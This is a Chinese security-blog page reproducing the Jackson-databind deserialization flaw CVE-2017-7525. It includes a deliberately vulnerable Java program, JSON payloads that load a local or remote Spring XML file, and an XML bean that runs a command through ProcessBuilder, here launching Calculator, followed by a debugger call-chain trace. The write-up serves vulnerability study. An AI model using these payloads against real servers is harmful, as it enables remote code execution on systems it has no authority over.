<!DOCTYPE html>
<html lang="zh-cmn-Hans">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="纯净水@流云-自留地">
    <link rel="shortcut icon" href="http://some.url/to/favicon.ico">
    <title>jackson反序列化漏洞_1-Adagio</title>
    
        
            <link href="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/academicons/1.8.6/css/academicons.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/font-awesome/5.9.0/css/all.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/animate.css/3.7.2/animate.min.css" rel="stylesheet">
        
    
    <link rel="stylesheet" href="/css/adagio.css">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>
<body>
    <div class="container-fluid">
    <nav class="nav">
        <div class="collapse navbar-collapse" id="navbar-sm">
            
            
            <div class="navbar-nav">
                <a href="https://hexo.io" class="nav-item nav-link">Hexo</a>
            </div>
            
            <div class="navbar-nav">
                <a href="http://www.hanlindong.com" class="nav-item nav-link">Adagio's author</a>
            </div>
            
        </div>
    </nav>
</div>

<div class="d-flex d-md-none" style="width: 100%; background-color: #e9ecef">
    
    <div class="nav">
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar-sm"
            aria-expanded="false" aria-label="Toggle Navigation">
            <i class="fas fa-bars fa-lg"></i>
        </button>
    </div>
    
    <nav class="navbar ml-auto">
        <a class="navbar-brand" href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
    </nav>
</div>


<div class="container d-none d-md-block my-navbar">
    <nav class="navbar navbar-expand-sm navbar-light bg-transparent">
        <a class="navbar-brand " href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
        
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
            aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
            <ul class="navbar-nav">
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="https://hexo.io">Hexo</a>
                </li>
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="http://www.hanlindong.com">Adagio's author</a>
                </li>
                
            </ul>
        </div>
        
    </nav>
</div>




    <div class="jumbotron jumbotron-fluid">
    <div class="container">
        
        <h1 class="mt-4 article-title page-title">jackson反序列化漏洞_1</h1>
        
        <p class="lead text-gray mt-3">By Anonymous; Published on 2020-01-13</p>
        
        <div class="tags">
            <ul class="tag-list">
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/web 渗透/">web 渗透</a>
                </li>
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/java反序列化/">java反序列化</a>
                </li>
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/jackson/">jackson</a>
                </li>
                
            </ul>
        </div>
        
    </div>
</div>
    <div class="container">
        <div class="row">
            <div class="col-md-9 pt-2">
                <div class="row">
                    <div class="col-12">
                        <main>
                            <article class="article-text page-content"><h1 id="jackson反序列化漏洞-1"><a href="#jackson反序列化漏洞-1" class="headerlink" title="jackson反序列化漏洞_1"></a>jackson反序列化漏洞_1</h1><p>[TOC]</p>
<h2 id="CVE-2017-7525"><a href="#CVE-2017-7525" class="headerlink" title="CVE-2017-7525"></a>CVE-2017-7525</h2><h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p>Jackson enableDefaultTyping 方法反序列化代码执行漏洞</p>
<p>《漏洞通告】Jackson-databind远程命令执行漏洞通告（CVE-2017-7525）》[1]指出，Jackson是一个开源的java序列化与反序列化工具，可以将java对象序列化为xml和json格式的字符串或将两种文件反序列化为相应的对象。</p>
<p>Jackson-databind存在远程命令执行漏洞，因Jackson反序列化漏洞（CVE-2017-7525）采用黑名单的方法修复程序，CVE-2017-17485在开启enableDefaultTyping()的前提下可以通过Jackson-databind来滥用Spring spel来执行任意命令。</p>
<h4 id="jackson-datablind"><a href="#jackson-datablind" class="headerlink" title="jackson-datablind"></a>jackson-datablind</h4><p>jackson本身提供的jackson-core的api调用起来会比较麻烦，jackson-datablind通过依赖core和annotations使jackson调用起来更简单</p>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><p>根据触发条件是ObjectMapper反序列化前调用了enableDefaultTyping方法。该方法允许json字符串中指定反序列化java对象的类名，而在使用Object、Map、List等对象时，可诱发反序列化漏洞<br>【1】Jackson 2.7版本（&lt;2.7.10）、2.8版本（&lt;2.8.9）<br>【2】调用了enableDefaultTyping方法<br>【3】反序列化的类可控</p>
<h4 id="测试代码"><a href="#测试代码" class="headerlink" title="测试代码"></a>测试代码</h4><p>【java】代码</p>
<pre class=" language-java"><code class="language-java"><span class="token keyword">package</span> jackson<span class="token punctuation">.</span>rce<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>nio<span class="token punctuation">.</span>file<span class="token punctuation">.</span>Files<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>nio<span class="token punctuation">.</span>file<span class="token punctuation">.</span>Paths<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>IOException<span class="token punctuation">;</span>
<span class="token keyword">import</span> com<span class="token punctuation">.</span>fasterxml<span class="token punctuation">.</span>jackson<span class="token punctuation">.</span>databind<span class="token punctuation">.</span>ObjectMapper<span class="token punctuation">;</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">App</span> 
<span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span> args <span class="token punctuation">)</span> <span class="token keyword">throws</span> IOException 
    <span class="token punctuation">{</span>
        ObjectMapper om <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ObjectMapper</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        om<span class="token punctuation">.</span><span class="token function">enableDefaultTyping</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> json <span class="token operator">=</span> Files<span class="token punctuation">.</span><span class="token function">readAllBytes</span><span class="token punctuation">(</span>Paths<span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span>args<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        inner i <span class="token operator">=</span> om<span class="token punctuation">.</span><span class="token function">readValue</span><span class="token punctuation">(</span>json<span class="token punctuation">,</span> inner<span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">class</span> <span class="token class-name">inner</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token keyword">int</span> id<span class="token punctuation">;</span>
    <span class="token keyword">public</span> Object obj<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
<p>通过传参得方式读入反序列化的类<br>【json】代码<br>本地读取xml</p>
<pre class=" language-json"><code class="language-json"><span class="token punctuation">{</span><span class="token property">"id"</span><span class="token operator">:</span><span class="token number">123</span><span class="token punctuation">,</span> <span class="token property">"obj"</span><span class="token operator">:</span> <span class="token punctuation">[</span><span class="token string">"org.springframework.context.support.FileSystemXmlApplicationContext"</span><span class="token punctuation">,</span> <span class="token string">"//Users/daiq/knownsec/工作/互联网/学习/java/RCE/jackson/cve_2017_2725/jackson-rce-via-spel/spel.xml"</span><span class="token punctuation">]</span><span class="token punctuation">}</span>
</code></pre>
<p>也可以远程读取，改成<code>http</code>协议就行</p>
<pre class=" language-json"><code class="language-json"><span class="token punctuation">{</span><span class="token property">"id"</span><span class="token operator">:</span><span class="token number">123</span><span class="token punctuation">,</span> <span class="token property">"obj"</span><span class="token operator">:</span> <span class="token punctuation">[</span><span class="token string">"org.springframework.context.support.FileSystemXmlApplicationContext"</span><span class="token punctuation">,</span> <span class="token string">"https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml"</span><span class="token punctuation">]</span><span class="token punctuation">}</span>
</code></pre>
<p>【xml】代码</p>
<pre class=" language-xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>beans</span> <span class="token attr-name">xmlns</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>http://www.springframework.org/schema/beans<span class="token punctuation">"</span></span>
  <span class="token attr-name"><span class="token namespace">xmlns:</span>xsi</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>http://www.w3.org/2001/XMLSchema-instance<span class="token punctuation">"</span></span>
  <span class="token attr-name"><span class="token namespace">xsi:</span>schemaLocation</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>bean</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>pb<span class="token punctuation">"</span></span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>java.lang.ProcessBuilder<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
     <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>constructor-arg</span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>/System/Applications/Calculator.app<span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span>
     <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>property</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>whatever<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>#{ pb.start() }<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>bean</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>beans</span><span class="token punctuation">></span></span>
</code></pre>
<h4 id="调用结果"><a href="#调用结果" class="headerlink" title="调用结果"></a>调用结果</h4><p><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752623110024.jpg" alt="-w1127"></p>
<h3 id="漏洞复现说明"><a href="#漏洞复现说明" class="headerlink" title="漏洞复现说明"></a>漏洞复现说明</h3><p>根据该漏洞调试情况，表面上问题主要出在readvalue传入的参数可控，在该案例中，通过读取json文件中的需要转换为inner类的json数据，该json数据中调用<code>FileSystemXmlApplicationContext</code>读入xml中的bean数据，在该方法的调用中实现命令执行</p>
<h4 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h4><p>【1】通过<code>FileSystemXmlApplicationContext</code>读取绝对路径时，得写上两个<code>\</code></p>
<h3 id="漏洞跟踪"><a href="#漏洞跟踪" class="headerlink" title="漏洞跟踪"></a>漏洞跟踪</h3><p>【1】readvalue函数需要参数 byte[],转换的类对象<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752631863029.jpg" alt="-w998"><br>【2】从接收的json字节流中创建解析对象<br><code>jsonfactory.creatParse</code>其中<code>src</code>为传入的字节流数据<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752636355629.jpg" alt="-w1121"><br>传入要转换的java对象<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752648786936.jpg" alt="-w951"></p>
<p>【3】通过2构造readMapAndClose传入数据来调用解析json数据<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752650611056.jpg" alt="-w1190"><br>传入的p0数据<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752650176156.jpg" alt="-w1064"></p>
<p>【4】反序列化json数据流<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752651998120.jpg" alt="-w1224"></p>
<p>…<br>…<br>object对象读入<br><code>deserializeFromString</code>-&gt;<code>createFromString</code>-&gt;<code>newInstance</code>-&gt;<br><code>loadBeanDefinitions</code>-&gt;<code>FileSystemXmlApplicationContext</code>-&gt;<code>refresh</code><br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752667685983.jpg" alt="-w980"></p>
<p><code>createFromString</code> ：读取json对象，读入xml文件内容<br><code>newInstance</code> ：调用<code>Class.forName</code>加载类 并实例化 即加载<br><code>org.springframework.context.support.FileSystemXmlApplicationContext</code> 实例处理xml文件中的内容</p>
<p><code>FileSystemResource</code> 读取xml内容<br><code>loadBeanDefinitions</code>:读取xml内容字节流，输入字节流处理<br><code>refresh</code>函数进行xml初始化实例<br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752816212912.jpg" alt="-w1040"></p>
<p><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752813499215.jpg" alt="-w523"><br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752830381227.jpg" alt="-w895"></p>
<p><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752832744311.jpg" alt="-w1018"><br><img src="/2020/01/13/Web渗透/java反序列化/jackson反序列化漏洞_1/15751936743604/15752835566747.jpg" alt="-w1035"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://chenergy1991.github.io/2019/03/24/CVE-2017-7275/" target="_blank" rel="noopener">CVE-2017-7275：Jackson-databind漏洞复现与分析笔记</a><br><a href="https://blog.csdn.net/u011499747/article/details/78762007" target="_blank" rel="noopener">Jackson之jackson-databind</a><br><a href="https://www.cnblogs.com/EasonJim/p/8449968.html" target="_blank" rel="noopener">Jackson工具类使用及配置指南、高性能配置（转）</a><br><a href="https://www.jianshu.com/p/de206c18ce08" target="_blank" rel="noopener">Java中newInstance()和new()</a></p>
</article>
                        </main>
                        
                        
                    </div>
                </div>
                <div class="row mt-5 mb-5">
                    <div class="col-12">
                        <div class="row">
    <div class="col">
        <nav aria-label="paginator" class="paginator">
            <ul class="pagination d-none d-md-flex pagination-lg justify-content-center">
                <li class="page-item  disabled ">
                    <a class="page-link"
                        href=""
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            No more</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2020/01/13/Web渗透/java反序列化/java反弹shell/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">java反弹shell
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
            <ul class="pagination d-md-none justify-content-center">
                <li class="page-item  disabled ">
                    <a class="page-link"
                        href=""
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            No more</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2020/01/13/Web渗透/java反序列化/java反弹shell/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">java反弹shell
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
        </nav>
    </div>
</div>



                    </div>
                </div>
                <div class="row">
                    <div class="col-12">
                        <div id="vcomment"></div>
                    </div>
                </div>
            </div>
            <div class="col-md-3">
                <div class="container pt-4 page-sidebar">
                    
                    <div class="row">
    <div class="col">
        <h6>APPLAUSE FOR ME</h6>
        <div id="applause-easy"></div>
    </div>
</div>
                    
                    <hr class="row">
                    <div class="row toc-container">
                        <div class="col-12">
                            <h6>NAVIGATION</h6>
                            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#jackson反序列化漏洞-1"><span class="toc-text">jackson反序列化漏洞_1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2017-7525"><span class="toc-text">CVE-2017-7525</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞简介"><span class="toc-text">漏洞简介</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#jackson-datablind"><span class="toc-text">jackson-datablind</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#环境搭建"><span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#利用条件"><span class="toc-text">利用条件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#测试代码"><span class="toc-text">测试代码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#调用结果"><span class="toc-text">调用结果</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现说明"><span class="toc-text">漏洞复现说明</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#注意事项"><span class="toc-text">注意事项</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞跟踪"><span class="toc-text">漏洞跟踪</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考"><span class="toc-text">参考</span></a></li></ol></li></ol>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer>
    <div class="jumbotron jumbotron-fluid mb-0">
        <div class="container-fluid">
            <div class="col text-center">
                <div class="bottom-social">
                    <div class="row">
    <div class="col text-center">
        <ul class="list-inline">
            
            <li class="list-inline-item">
                
                <a href="https://github.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.facebook.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-facebook-f fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.pinterest.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-pinterest-p fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.linkedin.com/in/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-linkedin-in fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
        </ul>
    </div>
</div>

                </div>
                <p class="copyright text-muted">
                    Copyright &copy; 吾善养浩然气
                    <br>
                    Thanks for coming!
                    <br>
                    <a href="https://github.com/Hanlin-Dong/hexo-theme-adagio">Adagio</a> - A <a href="https://hexo.io">Hexo</a> theme made with love by
                    <a href="http://www.hanlindong.com">Hanlin Dong</a>.
                </p>
            </div>
        </div>
    </div>
</footer>

    
    
        <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.slim.min.js"></script>
        <script src="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdn.bootcss.com/font-awesome/5.9.0/js/all.min.js"></script>
         
            <script type="text/x-mathjax-config">
                MathJax.Hub.Config({
                    CommonHTML: { linebreaks: { automatic: true } },
                    "HTML-CSS": { linebreaks: { automatic: true } },
                    SVG: { linebreaks: { automatic: true } }
                });
            </script>
            <script src='https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script>
        
    


<script src="/js/av.min.js"></script>
<script src="/js/valine.min.js"></script>
<script src="/js/applause-easy.js"></script>

<script>
$(document).ready(function() {
    var a = new ApplauseEasy({
        id: 'applause-easy',
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        img_src: "http://img.hanlindong.com/blog/site/clap.png",
        img_width: "50px",
        img_height: "50px"
    })
})
</script>


<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?123456789";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>



<script async src="https://www.googletagmanager.com/gtag/js?id=UA-11111111-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }
    gtag('js', new Date());
    gtag('config', 'UA-11111111-1');
</script>


    
    <script>
    new Valine({
        el: "#vcomment",
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        notify: false,
        varify: false,
        avatar: 'identicon',
        placeholder: "",
        recordIP: true
    })
</script>
    
</body>
</html>